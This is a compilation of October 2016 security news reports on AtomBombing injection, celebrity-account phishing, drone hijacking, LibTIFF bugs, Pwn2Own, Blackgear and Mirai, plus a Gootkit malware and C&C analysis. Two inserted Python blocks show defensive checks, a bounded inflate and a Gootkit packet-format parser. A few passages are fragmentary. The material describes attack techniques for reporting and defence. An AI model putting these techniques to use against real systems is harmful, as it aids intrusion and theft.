This Code Injection Technique can Potentially Attack All Versions of Windows
28.10.2016 thehackernews Vulnerability
Guess what? If you own a Windows PC, which is fully-patched, attackers can still hack your computer.
Isn't that scary? Well, definitely for most of you.
Security researchers have discovered a new technique that could allow attackers to inject malicious code into every version of Microsoft's Windows operating system, even Windows 10, in a manner that no existing anti-malware tool detects, threatening millions of PCs worldwide.
Dubbed "AtomBombing," the technique does not exploit any vulnerability but abuses a design weakness in Windows.
New Code Injection Attack helps Malware Bypass Security Measures
The AtomBombing attack abuses the system-level atom tables, a feature of Windows that lets applications store strings, objects and other data that they need to access regularly.
And since atom tables are shared, all sorts of applications can access or modify the data inside them. You can read a more detailed explanation of atom tables on Microsoft's blog.
A team of researchers from the cyber security company enSilo, who came up with the AtomBombing technique, say this design flaw in Windows allows malicious code to modify atom tables and trick legitimate apps into executing malicious actions on the malware's behalf.
Once injected into legitimate processes, the malware makes it easier for attackers to bypass security mechanisms that protect such systems from malware infections, the researchers said.
AtomBombing can Perform MITM Browser attack, Decrypt Passwords, and More
Besides bypassing process-level restrictions, the AtomBombing code injection technique also allows attackers to perform man-in-the-middle (MITM) browser attacks, remotely take screenshots of targeted users' desktops, and access encrypted passwords stored in a browser.
Google Chrome encrypts your saved passwords using Windows Data Protection API (DPAPI), which uses data derived from the current user to encrypt or decrypt the data and access the passwords.
So, if malware is injected into a process which is already running in the context of the current user, it is easy to access those passwords in plain text.
Moreover, by injecting code into a web browser, attackers can modify the content shown to the user.
"For example, in a banking transaction process, the customer will always be shown the exact payment information as the customer intended via confirmation screens," said Tal Liberman, Security Research Team Leader of enSilo.
"However, the attacker modifies the data so that the bank receives false transaction information in favor of the attacker, i.e. a different destination account number and possibly amount."
No Patch for AtomBombing Attack
What's worse? The company said all versions of the Windows operating system, including Microsoft's newest Windows 10, are affected. And what's even worse? There is no fix at this moment.
"Unfortunately, this issue cannot be patched since it does not rely on broken or flawed code – rather on how these operating system mechanisms are designed," said Liberman.
Since the AtomBombing technique abuses legitimate operating system functions to carry out the attack, Microsoft cannot patch the issue without changing how the entire operating system works. That is not a feasible solution, so there is no patch in sight.

AtomBombing Code Injection can potentially hack all Windows OS versions
28.10.2016 securityaffairs Vulnerability

Researchers from ENSILO have devised a method, called AtomBombing, to inject malicious code into Windows that bypasses modern anti-malware tools.
Security experts from ENSILO have devised a method, called AtomBombing, to inject malicious code into the Windows operating system in a way that modern anti-malware tools do not detect.

Atom tables are data structures the operating system uses to store strings, each paired with an identifier used to access it; a table can have global or local scope.

“An atom table is a system-defined table that stores strings and corresponding identifiers. An application places a string in an atom table and receives a 16-bit integer, called an atom, that can be used to access the string. A string that has been placed in an atom table is called an atom name.” reads a description published by Microsoft on the Atom Tables.

“The system provides a number of atom tables. Each atom table serves a different purpose. For example, Dynamic Data Exchange (DDE) applications use the global atom table to share item-name and topic-name strings with other applications.”

AtomBombing Code Injection

Attackers can write malicious code into an atom table and force a legitimate application to retrieve it from the table. Once the legitimate application has retrieved the code, the application can be manipulated into executing it.

“Our research team has uncovered a new way to leverage mechanisms of the underlying Windows operating system in order to inject malicious code. Threat actors can use this technique, which exists by design of the operating system, to bypass current security solutions that attempt to prevent infection. We named this technique AtomBombing based on the name of the underlying mechanism that this technique exploits.” states the analysis published by ENSILO.

The researchers explained that the AtomBombing technique relies on tricking a user into running a malicious executable, which then lets the attackers conduct several malicious activities, including snooping on memory to grab passwords and other sensitive information.

The experts highlighted that the AtomBombing method doesn't exploit a flaw in the OS code; instead, it relies on a mechanism that Windows implements by design.

“Unfortunately, this issue cannot be patched since it doesn’t rely on broken or flawed code – rather on how these operating system mechanisms are designed.”

Crime doesn’t pay, Fappening hacker gets 18 months in jail
28.10.2016 securityaffairs Crime

The person behind the Fappening case, Ryan Collins (36), received a lighter penalty than the five years in prison initially on the table for his guilty plea.
Do you remember the Fappening case? In 2014, a cache of nude photos and videos of celebrities was leaked online; the hackers had stolen them by accessing the victims' iCloud accounts.

The list of victims is long and includes Jennifer Lawrence and Kim Kardashian; the hacker stole the celebrities' private images and leaked their nude photos onto 4chan.

In March the DoJ announced the arrest of the alleged culprit in the Fappening case. The US Department of Justice (DOJ) announced it had charged Ryan Collins (36), of Pennsylvania, with hacking Apple and Google e-mail accounts belonging to more than 100 people, mostly celebrities.

“A Pennsylvania man was charged today with felony computer hacking related to a phishing scheme that gave him illegal access to over 100 Apple and Google e-mail accounts, including those belonging to members of the entertainment industry in Los Angeles.” states the press release issued by the DoJ.


He was charged with hacking 50 iCloud and 72 Gmail accounts owned by Hollywood stars.

Collins admitted his responsibility and signed a plea agreement to plead guilty to a felony violation of the Computer Fraud and Abuse Act.

The man sent spear phishing emails to the victims from November 2012 until the beginning of September 2014. In this way he obtained login credentials from his victims and then illegally accessed their e-mail accounts to reach sensitive personal information.

The man behind the Fappening case focused his efforts on obtaining nude pictures and videos of the victims; the DoJ announcement also revealed that in some circumstances he used software to download the entire contents of the victims' Apple iCloud backups.

In July, authorities also arrested a second man, Edward Majerczyk (28), who was charged with hacking 300 iCloud and Gmail accounts, 30 of which belonged to Hollywood stars.

Between them, Majerczyk and Collins hacked some 600 victims; both have pleaded guilty to charges involving sophisticated phishing attacks in which they sent malicious emails purporting to come from Apple and Google.

Collins received a lighter penalty than the five years in prison initially on the table for his guilty plea.

The identity of the person who leaked the images is still a mystery.

'Celebgate' Hacker Gets 18 Months in Prison for Hacking Celebrity Nude Photos
28.10.2016 thehackernews Crime
The hacker who stole nude photographs of female celebrities two years ago in a massive data breach — famous as "The Fappening" or "Celebgate" scandal — has finally been sentenced to 18 months in federal prison, authorities said on Thursday.
36-year-old Ryan Collins of Lancaster, Pennsylvania, was arrested in March and charged with hacking into "at least 50 iCloud accounts and 72 Gmail accounts," most of which were owned by Hollywood stars, including Jennifer Lawrence, Kim Kardashian, and Kate Upton.
Now, a judge in Harrisburg, Pennsylvania, on Wednesday sentenced Collins to 18 months in federal prison for violating the Computer Fraud and Abuse Act.
Here's How Collins Stole Celebrities' Nude Photos
Federal prosecutors said Collins ran a phishing scheme between November 2012 and September 2014 and hijacked the accounts of more than 100 people using fake emails disguised as official notifications from Google and Apple, asking victims for their account credentials.
"When the victims responded, Collins then had access to the victims' e-mail accounts. After illegally accessing the e-mail accounts, Collins obtained personal information including nude photographs and videos," the Justice Department said in a statement.
"In some instances, Collins would use a software program to download the entire contents of the victims' Apple iCloud backups. In addition, Collins ran a modeling scam in which he tricked his victims into sending him nude photographs."
Many of the compromised accounts belonged to famous female celebrities including Jennifer Lawrence, Kim Kardashian, Kate Upton, Kirsten Dunst, Aubrey Plaza, Rihanna, Avril Lavigne and Gabrielle Union.
Another suspect, Edward Majerczyk, 28, of Illinois, pleaded guilty in July after being charged with hacking 300 Gmail and iCloud accounts. However, authorities have yet to identify the uploader or 'leaker' of the photographs stolen by Collins and Majerczyk.
According to officials, Collins and Majerczyk hacked over 600 victims with their social engineering tricks.
Collins faced a maximum of five years in prison, but as part of his plea deal, prosecutors proposed a lighter sentence of only 18 months.

You Can Hijack Nearly Any Drone Mid-flight Using This Tiny Gadget
28.10.2016 thehackernews Hacking

Now you can hijack nearly any drone mid-flight just by using a tiny gadget.
Security researcher Jonathan Andersson has devised a small hardware device, dubbed Icarus, that can hijack a variety of popular drones mid-flight, locking the owner out and giving the attacker complete control over the device.
Andersson, who is the manager of Trend Micro's TippingPoint DVLab division, demonstrated this new hack at this year's PacSec security conference in Tokyo, Japan on Wednesday.
Besides drones, the new gadget can fully hijack a wide variety of radio-controlled devices, including helicopters, cars, boats and other remote-control gear that use the most popular wireless transmission control protocol, DSMx.
DSMx is a protocol used to facilitate communication between radio controllers and devices, including drones, helicopters, and cars.
This is not the first hardware that can hijack drones mid-flight. There are jamming devices available in the market that block controlling radio signals and render a drone useless. However, these devices do not give you control like Icarus does.
Icarus works by exploiting the DSMx protocol, granting attackers complete control over target drones, which lets them steer, accelerate, brake and even crash the aircraft.
The loophole relies on the fact that the DSMx protocol does not encrypt the 'secret' key that pairs a controller with a hobbyist device, so an attacker can recover this secret key by launching brute-force attacks, Andersson explained in his presentation.
Once the drone hijacker, Icarus box, grabs the key, an attacker can send malicious packets to restrict the original owner of the drone from sending legitimate control commands. Instead, the drone will accept commands from the attacker.
You can also watch the demonstration video to learn more about Icarus box.

There is little that can be done to mitigate this issue right now; affected manufacturers are releasing patches and updated hardware and securing the industry-wide encryption protocol in future drones.
"My guess is that it will not be easy to completely remedy the situation. The manufacturers and partners in the ecosystem sell standalone radio transmitters, models of all kinds, transmitters that come with models and standalone receivers," Andersson told Ars Technica.
"Only a certain set of standalone transmitters have a firmware upgrade capability, though the fix is needed on the model/receiver side."
Icarus has not been made available for sale, but this kind of gadget could benefit law enforcement as well as people who are worried about their safety and privacy. However, the same could also be used for nefarious purposes.
So, the next time an annoying drone flies overhead? Just hijack it and land it safely, rather than shooting it down.

The Icarus box is able to hijack nearly any drone mid-flight
28.10.2016 thehackernews Hacking

A security researcher presented a small hardware named Icarus box that is able to hijack a variety of popular drones mid-flight.
It could be very easy to hijack nearly any drone mid-flight using the hardware presented by the Trend Micro researcher Jonathan Andersson at the PacSec hacking conference in Japan this week. Andersson, who leads Trend Micro's TippingPoint DVLab division, presented a small hardware device named Icarus that is able to hijack a variety of popular drones mid-flight; the attacker gains full control of the vehicle by locking the owner out.

According to Andersson, the Icarus box is able to hack into radio-controlled vehicles that run the DSMx radio platform. Unfortunately, the DSMx radio platform is very popular for drones; it is present in vehicles manufactured by many vendors, including Walkera, NineEagles and AirTronics.

“It’s not a jamming system so I am not competing for control via RF power,” Andersson explained to Vulture South.

“Full flight control is achieved with the target experiencing a complete loss of control — it’s a clean switch-over.

“The range of my proof of concept implementation is equal to a standard DSMx radio transmitter, though standard 2.4GHz ISM band amplification can be applied to extend the range.”

The principle behind the Icarus box is simple: the hardware determines the unique shared secret key within the DSMx binding process by monitoring the component's activity and running a brute-force attack. Once the Icarus box grabs the key, the attacker can send malicious packets to lock the legitimate controller out and send his own commands.
Below is a video PoC of the attack.
“It works against all DSMx based radio systems, which would include drones, airplanes, cars, boats, and so on,” Andersson added.
The only way to protect a drone against this kind of attack is to update the receivers' firmware protocols, an operation that is not always possible on many drones.

“My guess is that it will not be easy to completely remedy the situation. The manufacturers and partners in the ecosystem sell standalone radio transmitters, models of all kinds, transmitters that come with models and standalone receivers,” Andersson told Ars Technica.

“Only a certain set of standalone transmitters have a firmware upgrade capability, though the fix is needed on the model/receiver side.”

Below are the slides prepared by Andersson.

Three bugs found in the LibTIFF, one of them yet to be patched
28.10.2016 securityaffairs Vulnerability

The LibTIFF library is affected by three vulnerabilities, but unfortunately one of them, tracked as CVE-2016-8331, is still unpatched.
LibTIFF is a library for reading and writing Tagged Image File Format (TIFF) files, and according to the experts from Cisco Talos it is affected by three vulnerabilities. The bugs could be exploited by attackers to compromise a system using booby-trapped images. The bad news is that only two of the three vulnerabilities have been fixed.

The vulnerabilities affect the latest version 4.0.6, released in September.

CVE-2016-5652 (TALOS-2016-0187) – LibTIFF tiff2pdf JPEG Compression Tables Heap Buffer Overflow
CVE-2016-8331 (TALOS-2016-0190) – LibTIFF FAX IFD Entry Parsing Type Confusion
CVE-2016-5875 (TALOS-2016-0205) – LibTIFF PixarLogDecode Heap Buffer Overflow
The Talos post says the company found the bugs in LibTiff – 4.0.6, released in September.

The LibTIFF FAX IFD Entry Parsing Type Confusion affects the LibTIFF code that handles the BadFaxLines field, which is specific to fax systems; it could be exploited using a specifically crafted image that triggers an out-of-bounds memory write, leading to remote code execution. This vulnerability is still unpatched.

“CVE-2016-8331 occurs during the parsing and handling of TIFF images using the LibTIFF API that is present in the standard build. RFC 2306 defines a series of fields used within the TIFF format for use specifically in fax systems which are fully supported by the LibTIFF library.” states the analysis published by Cisco Talos. “The vulnerability exists in the handling of one of these fields, `BadFaxLines`, that can result in a write to out of bounds memory. Attackers can create a specially crafted TIFF file to exploit this vulnerability and execute arbitrary code on affected systems.”

CVE-2016-5652 is a heap buffer overflow that resides in the tiff2pdf tool. Attackers can exploit it using a crafted file that crashes the library.


CVE-2016-5875 is a heap buffer overflow that resides in the way compressed TIFF images in LibTIFF’s PixarLogDecode API are handled.

“To decompress the PixarLog compressed data inside of a TIFF image, LibTIFF uses the Zlib compression library. First, a buffer with the parameters needed to be passed to Zlib are set up with a function call to `PixarLogSetupDecode`. Later this buffer is used when calling the Zlib library function `inflate` which is responsible for the actual decompression. Passing an undersized buffer into the Zlib `inflate` function causes a heap overflow that could be potentially leveraged into remote code execution.”
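
The defect Talos describes above is a size mismatch: the buffer handed to inflate is smaller than the data the stream will produce. The following is an added example in Python, not LibTIFF or Talos code, showing the check a decoder should make instead: it bounds zlib's output at the caller's declared size and rejects a stream that would overrun it, one that ends early, and one that is not a valid stream at all. The sample data, the `declared_size` parameter and the error kinds are constructed for the example.

```python
"""Added example, not LibTIFF or Talos code: a bounded inflate that refuses to
produce more output than the caller's declared size. Sample data is constructed."""
import zlib


class InflateError(ValueError):
    """Raised when a stream does not fit the size the caller declared."""

    def __init__(self, kind: str, detail: str = "") -> None:
        super().__init__(f"{kind}: {detail}" if detail else kind)
        self.kind = kind  # "overflow", "truncated" or "corrupt"


def safe_inflate(stream: bytes, declared_size: int) -> bytes:
    """Inflate `stream` into at most `declared_size` bytes, or raise.

    The LibTIFF bug passes inflate() a heap buffer smaller than the data it
    will produce, so the surplus is written past the buffer. Here the same
    mistake is caught up front: zlib is asked for at most declared_size + 1
    bytes, and any byte beyond declared_size proves the stream would have
    overrun the buffer.
    """
    if declared_size < 0:
        raise InflateError("corrupt", "negative declared size")
    d = zlib.decompressobj()
    try:
        out = d.decompress(stream, declared_size + 1)
    except zlib.error as exc:
        raise InflateError("corrupt", str(exc)) from exc
    if len(out) > declared_size:
        raise InflateError("overflow", f"stream yields more than {declared_size} bytes")
    if not d.eof:
        # Output fit, but the end-of-stream marker never arrived: the
        # compressed data was cut short (or the trailer is missing).
        raise InflateError("truncated", "stream ended before its end marker")
    return out


def classify(stream: bytes, declared_size: int) -> str:
    """Triage helper: "ok" or the InflateError kind, for a batch of samples."""
    try:
        safe_inflate(stream, declared_size)
        return "ok"
    except InflateError as exc:
        return exc.kind


# Constructed sample: 2048 bytes of compressible "strip" data and its zlib stream.
SAMPLE_PLAIN = bytes(range(256)) * 8
SAMPLE_STREAM = zlib.compress(SAMPLE_PLAIN)

if __name__ == "__main__":
    for declared in (2048, 4096, 2047):
        print(declared, classify(SAMPLE_STREAM, declared))
    print("trailer cut", classify(SAMPLE_STREAM[:-4], 2048))
    print("garbage", classify(b"not a zlib stream", 64))
```

Running the block as a script prints the triage result for each constructed case. The reason for asking zlib for `declared_size + 1` bytes rather than exactly `declared_size` is that the single surplus byte is what distinguishes "fits exactly" from "would have overflowed"; a decoder that only checks `len(out) <= declared_size` after an unbounded inflate has already done the work an attacker wanted.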

The vulnerability was reported by Mathias Svensson of Google's Security Team; the researcher Evan Rouault of SpatialSys published a fix on GitHub.

that is used to manage JPEG compression for TIFF images. The flaw was reported by Mathias Svensson of Google's Security Team. The researcher Evan Rouault of SpatialSys published a fix for the flaw on GitHub.

“TIFF offers support for multiple compression algorithms inside of the image itself. One such algorithm is the JPEG compression. This vulnerability arises in the calculating of the images tile size. A specially crafted TIFF image file can lead to an out of bounds write and ultimately to remote code execution. An attacker who can trick a user into using this utility with a crafted TIFF document can cause a heap based buffer overflow that results in remote code execution.” continues the analysis.

Chinese Hackers won $215,000 for Hacking iPhone and Google Nexus at Mobile Pwn2Own
27.10.2016 thehackernews Security
The Tencent Keen Security Lab Team from China has won a total prize money of $215,000 in the 2016 Mobile Pwn2Own contest run by Trend Micro's Zero Day Initiative (ZDI) in Tokyo, Japan.
Despite the high-security measures implemented in current devices, the famous Chinese hacking crew successfully hacked both Apple's iPhone 6S and Google's Nexus 6P phones.
Hacking iPhone 6S
For hacking Apple's iPhone 6S, Keen Lab exploited two iOS vulnerabilities – a use-after-free bug in the renderer and a memory corruption flaw in the sandbox – and stole pictures from the device, for which the team was awarded $52,500.
The iPhone 6S exploit successfully worked despite the iOS 10 update rolled out by Apple this week.
Earlier this week, Marco Grassi from Keen Lab was credited by Apple for finding a serious remote code execution flaw in iOS that could compromise a victim's phone by just viewing "a maliciously crafted JPEG" image.
However, a  from Keen Team indicated it was able to make the attack successfully work on iOS 10.1 as well.
The Keen Lab also managed to install a malicious app on the iPhone 6S, but the app did not survive a reboot due to a default configuration setting, which prevented persistence. Still, the ZDI awarded the hackers $60,000 for the vulnerabilities they used in the hack.
Hacking Google's Nexus 6P
For hacking the Nexus 6P, the Keen Lab Team used a combination of two vulnerabilities and other weaknesses in Android and managed to install a rogue application on the Google Nexus 6P phone without user interaction.
The ZDI awarded them a whopping $102,500 for the Nexus 6P hack.
So, of the total potential payout of $375,000 from the Trend Micro's Zero Day Initiative, the Keen Lab Team researchers took home $215,000.

Hackers behind the BLACKGEAR espionage campaign now targets Japan
27.10.2016 securityaffairs Cyber
The threat actor behind the Blackgear cyber-espionage campaign that is targeting Japanese entities is the same that hit Taiwan in 2012.
According to security experts from Trend Micro, Japanese organizations were targeted in an espionage campaign dubbed Blackgear.

The attackers behind Blackgear appear to be the same ones that targeted users in Taiwan in 2012; they used a well-known strain of malware detected by many security firms as Elirks.

The attack vectors are spear phishing emails and compromised websites used to serve the malware in watering hole attacks. The websites used in the watering hole attacks delivered malicious code that drops decoy documents and the downloaders used to fetch the group's backdoors (i.e. Elirks and Ymalr).

The researchers noticed that both Elirks and Ymalr used blogging services as command and control (C&C) infrastructure in order to make detection harder, allowing the attackers to keep the location of the actual C&C server hidden and to change the server in use easily.

“BLACKGEAR is an espionage campaign which has targeted users in Taiwan for many years. Multiple papers and talks have been released covering this campaign, which used the ELIRKS backdoor when it was first discovered in 2012. It is known for using blogs and microblogging services to hide the location of its actual command-and-control (C&C) servers. This allows an attacker to change the C&C server used quickly by changing the information in these posts.” reads the blog post published by Trend Micro.

“Like most campaigns, BLACKGEAR has evolved over time. Our research indicates that it has started targeting Japanese users.”


The researchers speculate that BLACKGEAR has evolved over time and that the threat actors behind the espionage campaign have now moved on to Japan. The decoy documents used in the attacks are now in Japanese, and the blogging services used as part of the C&C infrastructure are based in Japan.

The experts from Palo Alto Networks arrived at the same conclusion after noticing cyber attacks against organizations in Japan this summer that presented many similarities with attacks against targets in Taiwan.

Inside the Gootkit C&C server
27.10.2016 Kaspersky Virus
The Gootkit bot is one of those malicious programs that rarely attract much attention from researchers. The reason is its limited propagation and its lack of distinguishing features.

There are some early instances, including on Securelist (here and here), where Gootkit is mentioned in online malware research as a component in bots and Trojans. However, the first detailed analysis was published by researchers around two years ago. That was the first attempt to describe the bot as a standalone malicious program, where it was described as a “new multi-functional backdoor”. The authors of that piece of research put forward the assertion that the bot’s features were borrowed from other Trojans, and also provided a description of some of Gootkit’s key features.

In September 2016, we discovered a new version of Gootkit with a characteristic and instantly recognizable feature: an extra check of the environment variable ‘crackme’ in the downloader’s body. This feature was not present in the early versions. Just as interesting was the fact that we were able to gain access to the bot’s C&C server, including its complete hierarchical tree of folders and files and their contents.


As before, the Gootkit bot is written in NodeJS and is downloaded to a victim's computer via a chain of downloaders. The main purpose of the bot also remained the same: to steal banking data. The new Gootkit version, detected in September, primarily targets clients of European banks, including those in Germany, France, Italy, the Netherlands, Poland, etc.

The Trojan’s main propagation methods are spam messages with malicious attachments and websites containing exploits on infected pages (Rig Exploit Kit). The attachment in the spam messages contained Trojan-Banker.Win32.Tuhkit, the small initial downloader that launched and downloaded the main downloader from the C&C server, which in turn downloaded Gootkit.

[Figure: Examples of infected pages used to spread the Trojan]

While carrying out our research we detected a huge number of versions of the initial downloader used to distribute the Trojan; most of them are detected as Trojan.Win32.Yakes. Some of the loaders were extremely odd, like the one shown below, which clearly stated in its code that it was a loader for Gootkit.

[Figure: Section of code from one of the initial downloaders]

Some versions of Gootkit are also able to launch the main body with administrator privileges bypassing UAC. To do so, the main loader created an SDB file and registered it in the system with the help of the sdbinst.exe utility, after which it launched the bot with elevated privileges without notifying the user.

‘Crackme’ check

The new version of Gootkit is distinct in that it checks the environment variable ‘crackme’ located in the downloader body. It works as follows: the value of the variable is compared to a fixed value. If the two values differ, the bot starts to check if it has been launched in a virtual environment.

[Figure: Checking the global variable in the downloader’s body]

To do so, the bot checks the variable ‘trustedcomp’, just like it did in earlier versions.

[Figure: Checking the bot’s body for launch in a virtual environment]

The Trojan’s main body

The Trojan’s main file includes a NodeJS interpreter and scripts. After unpacking, the scripts look like this:

[Figure: NodeJS scripts that make up the Trojan’s main body]

The scripts shown in the screenshot constitute the main body of the Trojan. Gootkit has about a hundred various scripts, but they are mostly for practical purposes (intermediate data handlers, network communication DLLs, wrapper classes implementations, encoders etc.) and not of much interest.

The Trojan itself is distributed in an encrypted and packed form. Gootkit is encrypted with a simple XOR with a round key; unpacking is performed using standard Windows API tools. The screen below shows the first 255 bytes of the transferred data.

[Figure: The Trojan’s packed body]

The first three DWORDs denote the sizes of the received, unpacked and packed data respectively. One can easily check this by subtracting the third DWORD from the first, which leaves 12 bytes, i.e. the size of these three variables.

Stealing money

Interception of user data is done the standard way, via web injections into HTTPS traffic (examples of these web injects are shown below). After the data is sent to the C&C server, it is processed by parsers, each of which is associated with the website of a specific bank.

[Figure: Fragment of parser code]

Communication with the C&C

In the version of Gootkit under review, the C&C address is the same as the address from which the Trojan’s main body is downloaded; in earlier versions, these two addresses sometimes differed. While generating a request, the Trojan uses its unique User Agent – any request that does not specify a User Agent will be denied.

[Figure: The unique GootKit User Agent]

Communication with the C&C comes down to the exchange of a pre-defined set of commands, the main ones being:

Request a list of files available to the Trojan (P_FS:FS_READDIR);
Receive update for the bot (P_FS:FS_GETFILE);
Obtain screenshot (P_SPYWARE:SP_SCREENSHOT);
Upload list of processes (P_SPYWARE:SP_PROCESSLIST);
Terminate process (P_SPYWARE:SP_PROCESSKILL);
Download modules (P_FS:FS_GETFILE);
Receive web injects (P_SPYWARE:SP_SPYWARE_CONFIG).

[Figure: The bot’s main commands and sub-commands]

The C&C addresses (two or three in number) are hardwired in the loader’s body and can also be saved in the registry. The body of the data packet may vary depending on the request type, but always includes the following variables:

Size of data packet, plus eight;
Check value XORed with a constant;
Command type;
Command sub-type.
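
The two byte layouts described above (the 12-byte size header on the packed body, with received minus packed equal to 12, and the four variables at the start of every C&C packet) are the kind of thing an analyst encodes as a small parser to triage captured samples. The following is an added example in Python, not Gootkit's code or Kaspersky's tooling: it validates the size-header invariant, frames and decodes C&C packets, and names commands from the list above. Little-endian 32-bit fields, the XOR constant `CHECK_XOR_CONSTANT`, the numeric command values and all sample bytes are assumptions; only the field order and the invariant come from the analysis.

```python
"""Added example, not Gootkit's code: parsers for the two framing formats the
analysis describes. Field order comes from the text; endianness, field widths,
the XOR constant, command numbers and sample bytes are constructed assumptions."""
import struct

# Packed-body header: received, unpacked and packed sizes (little-endian assumed).
BODY_HEADER = struct.Struct("<III")


def parse_packed_body(blob: bytes) -> dict:
    """Check the 12-byte size header on a downloaded body and split off the payload.

    The one invariant the text gives, received - packed == 12, lets an analyst
    tell a whole Gootkit body from a partial capture or unrelated data before
    attempting to unpack it.
    """
    if len(blob) < BODY_HEADER.size:
        raise ValueError("shorter than the 12-byte size header")
    received, unpacked, packed = BODY_HEADER.unpack_from(blob, 0)
    if received - packed != BODY_HEADER.size:
        raise ValueError(f"invariant broken: {received} - {packed} != 12")
    if len(blob) != received:
        raise ValueError(f"header declares {received} bytes, capture has {len(blob)}")
    return {"received": received, "unpacked": unpacked, "packed": packed,
            "payload": blob[BODY_HEADER.size:]}


def is_valid_body(blob: bytes) -> bool:
    """True when the blob passes every header check above."""
    try:
        parse_packed_body(blob)
        return True
    except ValueError:
        return False


# C&C packet header, in the order the text lists the four variables.
CC_HEADER = struct.Struct("<IIII")  # size + 8, check ^ const, command type, sub-type
CHECK_XOR_CONSTANT = 0x5A5A5A5A     # placeholder: the real constant is not on the page
COMMANDS = {                         # names from the text; numbers are placeholders
    (1, 1): "P_FS:FS_READDIR",
    (1, 2): "P_FS:FS_GETFILE",
    (2, 1): "P_SPYWARE:SP_SCREENSHOT",
    (2, 2): "P_SPYWARE:SP_PROCESSLIST",
    (2, 3): "P_SPYWARE:SP_PROCESSKILL",
    (2, 4): "P_SPYWARE:SP_SPYWARE_CONFIG",
}


def frame_cc_packet(cmd: int, sub: int, body: bytes, check: int) -> bytes:
    """Build a packet in the described layout; used here only to make sample data."""
    return CC_HEADER.pack(len(body) + 8, check ^ CHECK_XOR_CONSTANT, cmd, sub) + body


def parse_cc_packet(pkt: bytes) -> dict:
    """Decode the header, undo the XOR on the check value and name the command."""
    if len(pkt) < CC_HEADER.size:
        raise ValueError("shorter than the 16-byte packet header")
    size, check_enc, cmd, sub = CC_HEADER.unpack_from(pkt, 0)
    body = pkt[CC_HEADER.size:]
    if size != len(body) + 8:
        raise ValueError(f"size field {size} != body length {len(body)} + 8")
    return {"check": check_enc ^ CHECK_XOR_CONSTANT, "cmd": cmd, "sub": sub,
            "name": COMMANDS.get((cmd, sub), "unknown"), "body": body}


# Constructed samples: a 40-byte payload with a consistent header, and a
# screenshot request with an empty body.
SAMPLE_BODY = BODY_HEADER.pack(BODY_HEADER.size + 40, 1024, 40) + bytes(40)
SAMPLE_PACKET = frame_cc_packet(2, 1, b"", check=0x1234)

if __name__ == "__main__":
    print(parse_packed_body(SAMPLE_BODY)["packed"], is_valid_body(SAMPLE_BODY[:-1]))
    print(parse_cc_packet(SAMPLE_PACKET)["name"])
```

The size-field checks are deliberately strict: a capture that is one byte short, or a header whose first and third DWORDs do not differ by exactly 12, is rejected rather than passed on to an unpacker, which is the cheap way to keep corrupt or unrelated blobs out of a sample pipeline.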
In the screen below, the C&C requests registration information from the bot during its first launch.

[Figure: Request from C&C, example of variables]

The response in this case will contain detailed information about the infected computer, including:

Network adapter parameters;
CPU details, amount of RAM;
User name, computer name.
Regardless of the request type, data is exchanged between the C&C and the bot in protobuf format.

When the main body is downloaded, the address that the loader contacts typically ends in one of the following strings:

Mystery solved…rather easily

We found a configuration error that often appears on botnet C&C servers and took advantage of it to capture a complete tree of folders and files, as well as their contents, from one of the GootKit C&C servers.


[Figure: Contents of GootKit C&C server]

The C&C server contains a number of parsers for different banking sites. These parsers are used (provided the user data is available) to steal money from user accounts and to send notifications via Jabber. The stolen data is stored as text files, with the infected computer’s IP address used as the file name.

[Figure: Stolen data and logs on the bot’s C&C server]

[Figure: Example of stolen data in one of the text files]

Other data (bank transfers and logs) is also stored in text file format.

[Figure: Parser logs]

An analysis of the bot’s web injects and parser logs has shown that the attackers primarily target the clients of German and French banks.

Distribution of web injects across domain zones

Excerpts from parser logs

Analysis of the server content and the parsers made it clear that the botnet’s creator was a Russian speaker. Note the comments in the screen below.

A fragment of script including the author’s comments in Russian

Moreover, Gootkit most probably has just one owner – it’s not for sale anywhere and, regardless of the downloaders’ modifications or type of admin panel, the code in NodeJS (the Trojan’s main body) is always the same.

Examples of Gootkit web injects


Gootkit belongs to a class of Trojans that are extremely tenacious, albeit not very widespread. Because it’s not very common, new versions of the Trojan may remain under the researchers’ radar for long periods.

It should also be noted that by choosing NodeJS as a development platform the authors accept certain limitations, but in return gain a substantial degree of flexibility and simplicity when creating new versions of the Trojan.

Kaspersky Lab’s security products detect the Trojan GootKit and all its associated components under the following verdicts:

Trojan-Banker.Win32.Tuhkit (the initial downloader distributed via emails);
Trojan.Win32.Yakes (some modifications of the main downloader);
HEUR:Trojan.Win32.Generic (the bot’s main body, some modifications of the downloader).


Friday's Massive DDoS Attack Came from Just 100,000 Hacked IoT Devices
27.10.2016 thehackernews Attack
Guess how many devices participated in last Friday's massive DDoS attack against DNS provider Dyn that caused a vast internet outage?
Just 100,000 devices.
I did not miss any zeros.
Dyn disclosed on Wednesday that a botnet of an estimated 100,000 internet-connected devices was hijacked to flood its systems with unwanted requests and close down the Internet for millions of users.
Dyn executive vice president Scott Hilton has issued a statement, saying all compromised devices had been infected with the notorious Mirai malware, which has the ability to take over cameras, DVRs, and routers.
"We're still working on analyzing the data but the estimate at the time of this report is up to 100,000 malicious endpoints," Hilton said. "We are able to confirm that a significant volume of attack traffic originated from Mirai-based botnets."
Mirai malware scans for Internet of Things (IoT) devices that are still using their default passwords and then enslaves those devices into a botnet, which is then used to launch DDoS attacks.
A day after the attack, Dyn confirmed that a botnet of Mirai malware-infected devices had participated in Friday's Distributed Denial of Service attacks.
However, after an initial analysis of the junk traffic, the company revealed yesterday that it had identified an estimated 100,000 sources of malicious DDoS traffic, all originating from IoT devices compromised by the Mirai malware.
Earlier the company believed that approximately "tens of millions" of IP addresses were responsible for the massive attack against its crucial systems, but the actual number turned out to be much smaller, leaving all of us wondering:
How did the Attack Succeed to this Massive Level?
To this, Hilton said that the Domain Name System (DNS) protocol itself has the ability to amplify requests from legitimate sources.
"For example, the impact of the attack generated a storm of legitimate retry activity as recursive servers attempted to refresh their caches, creating 10-20X normal traffic volume across a large number of IP addresses," Hilton said. "When DNS traffic congestion occurs, legitimate retries can further contribute to traffic volume."
"It appears the malicious attacks were sourced from at least one botnet, with the retry storm providing a false indicator of a significantly larger set of endpoints than we now know it to be."
Friday's cyber attack overwhelmed Dyn's central role in routing and managing Internet traffic, rendering hundreds of sites and services, including Twitter, GitHub, Amazon, Netflix, Pinterest, Etsy, Reddit, PayPal, and AirBnb, inaccessible to millions of people worldwide for several hours.
Dyn did not disclose the actual size of the attack, but it has been speculated that the DDoS attack could be much bigger than the one that hit French Internet service and hosting provider OVH that peaked at 1.1 Tbps, which is the largest DDoS attack known to date.
According to the company, this attack has opened up an important debate about Internet security and volatility.
